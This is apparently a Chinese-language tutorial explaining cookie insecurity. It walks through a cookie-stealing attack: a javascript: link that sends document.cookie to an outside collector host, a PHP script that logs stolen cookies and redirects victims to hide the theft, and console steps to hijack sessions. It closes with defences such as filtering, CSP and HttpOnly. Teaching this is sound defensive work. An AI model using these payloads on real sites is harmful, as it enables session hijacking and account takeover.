都说cookie不安全,现在通过一个很简单的例子来说明它为什么不安全。
对于cookie的概念这里就不做阐述了。前端截取cookie的方式有多种,下面介绍一种比较简单的手法。
首先:
小黑会在各种网站发布帖子,然后在某些特定的地方添加吸引人点击的内容,而该内容会有一些超链接。比如在A网站,小黑在发布的内容中加个超链接:
<a href=”JS_URL” target=”_blank”>点击我,跳转到B网站</a>
然后JS_URL 用如下形式:
javascript:window.location.href='http://www.getcookie.com/info.php?usercookie='+document.cookie;
或者
javascript:window.open('http://www.getcookie.com/info.php?usercookie='+document.cookie);
然后:
小黑在自己的服务器上也就是www.getcookie.com 上写好脚本info.php,接收以上超链接传输过来的cookie。
Info.php
<?php
$info=$_GET[‘usercookie’];
if($info){
file_put_contents('./cookie_log.txt', $info.PHP_EOL, FILE_APPEND);
}
header("Location:http://www.B.com");//因为超链接是要跳转到B网站,拿到cookie后再给他跳转,不容易被发现。
最后:
小黑拿到其他用户的cookie后,在A网站登录自己的账号,然后只需要将自己账号的cookie改成前面截取到的cookie。具体步骤:
进入F12的控制台,执行:document.cookie = 'PHPSESSID= aaaaaaaaaaaa;'; 有的网站有多个cookie,每个cookie会对应不同子域名,所有这种需要在设置cookie时加上有效的域名和目录等。比如:document.cookie = PHPSESSID =aaaaaaaaaaaa;'+ 'path=/;'+ 'domain=.A.com'; 表示一级域名下有效。
如果没有A网站的账号,也可以直接设置cookie到该网站的域名下,不过这样可能花费的调试时间多些,因为有些网站有多个cookie,各个cookie对应的子域名、目录等可能不一样。如果自己有一个账号,只要登录后替换对应键的cookie值就可以了。
除了在控制台执行document.cookie,也可以Application项目的Cookies栏目下修改cookie值。
刷新一下,就能获得别人账号的权限了。
对于这种XSS攻击,有时真的是防不胜防,但也还得防。
防范方式:
1)字符的过滤,将用户输入的字符进行特殊字符过滤或转义,比如空格,单引号,双引号,尖括号等;
2)避免cookie中泄露用户隐私,也可以通过cookie和ip绑定来降低泄露风险。
3)提交表单尽量用POST而非GET
4)内容安全策略——CSP(Content-Security-Policy),一种以可信白名单作机制,来限制网站中是否可以包含某来源内容。默认配置下不允许执行内联代码
5)设置cookie为httponly。这样前端就无法通过document.cookie截取到该cookie值。比如php的设置方法:
方法一、在php.ini配置文件中进行cookie只读设置的开启 :session.cookie_httponly = On
方法二、在php代码顶部设置
<?php
ini_set("session.cookie_httponly", 1);
//php5.1以前版本设置方法:header("Set-Cookie: hidden=value; httpOnly");
?>